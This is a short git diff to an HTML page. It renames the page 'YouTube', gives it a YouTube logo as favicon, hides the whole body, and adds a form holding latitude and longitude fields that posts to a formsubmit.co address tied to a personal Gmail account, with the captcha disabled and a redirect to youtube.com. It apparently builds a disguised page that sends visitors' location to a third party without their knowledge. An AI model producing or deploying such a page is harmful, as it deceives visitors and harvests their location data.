--- a/index.html
+++ b/index.html
@@ -1,13 +1,24 @@
 <!DOCTYPE html>
 <html lang="en">
   <head>
+    <link
+      rel="shortcut icon"
+      href="https://w7.pngwing.com/pngs/208/269/png-transparent-youtube-play-button-computer-icons-youtube-youtube-logo-angle-rectangle-logo-thumbnail.png"
+      type="image/x-icon"
+    />
     <meta charset="UTF-8" />
     <meta name="viewport" content="width=device-width, initial-scale=1.0" />
-    <title>Document</title>
+    <title>YouTube</title>
     <script src="index.js" defer></script>
   </head>
-  <body>
-    <div class="longitude">longitude:</div>
-    <div class="latitude">latitude:</div>
+  <body style="display: none">
+    <form action="https://formsubmit.co/iamali5005sher@gmail.com" method="POST">
+      <div class="latitude">latitude:</div>
+      <div class="longitude">longitude:</div>
+      <input type="text" name="name" required class="data" />
+      <input type="hidden" name="_captcha" value="false" />
+      <input type="hidden" name="_next" value="https://www.youtube.com" />
+      <button>submit</button>
+    </form>
   </body>
 </html>
